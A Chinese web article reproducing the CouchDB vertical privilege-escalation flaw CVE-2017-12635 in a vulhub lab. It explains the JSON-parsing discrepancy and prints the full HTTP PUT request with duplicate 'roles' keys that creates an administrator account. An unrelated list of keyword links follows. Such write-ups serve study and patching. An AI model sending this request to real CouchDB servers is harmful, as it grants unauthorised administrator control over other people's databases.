couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。Cou
千家信息网最后更新 2025年12月01日couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的
这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 "Couch" 是 "Cluster Of Unreliable Commodity Hardware" 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也是如此。
CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
下面仅作漏洞复现记录与实现,利用流程如下:
一、漏洞环境
目标链接:http://192.168.101.152:5984/
直接访问是这样子的
访问http://192.168.101.152:5984/_utils/后如下
直接点击_users会提示无权访问数据库
二、利用流程
首先发送第一个数据包,会提示403错误,提示只有管理员可以设置角色
但发送包含两个roles的数据包,即可绕过限制,创建一个管理员账户,这里创建了一个账户密码皆为vulhub的管理员账户
PUT /_users/org.couchdb.user:vulhub HTTP/1.1Host: 192.168.101.152:5984Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 108{"type": "user","name": "vulhub","roles": ["_admin"],"roles": [],"password": "vulhub"}再回到前台登录,已经可以访问了

关于couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
管理
数据
管理员
账户
提示
内容
数据库
文章
更多
流程
目标
知识
篇文章
不同
不错
两个
前台
只有
可以通过
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
服务器是选阿里还是选腾讯的
云服务器安装redis
公网服务器网络安全防护
xp本地服务器搭建
数据库会出现乱码吗为什么
网络安全法100问
四川儿童虹膜数据库
计算机软件开发专业涉及范围
曹县网络安全管理会议
红量网络技术有限公司
分布式文件服务器怎么做权限控制
与艾尔登法环服务器断开连接
企业网络安全防护评测表
龙泉网络安全宣传
软件开发常用组件有哪些
沧州人工智能软件开发
数据库创建学生表知识点
广平县天气预报软件开发
tcp 服务器安全性
下列数据库中可进行药学
数据库三级考试速过
国际对网络安全的研究
网络安全员需要学习什么
与艾尔登法环服务器断开连接
网络技术全部要点
邮箱 发件服务器
数据库 暗黑2
销售单打印软件开发
公务员申论有关网络安全试题
襄阳国家网络安全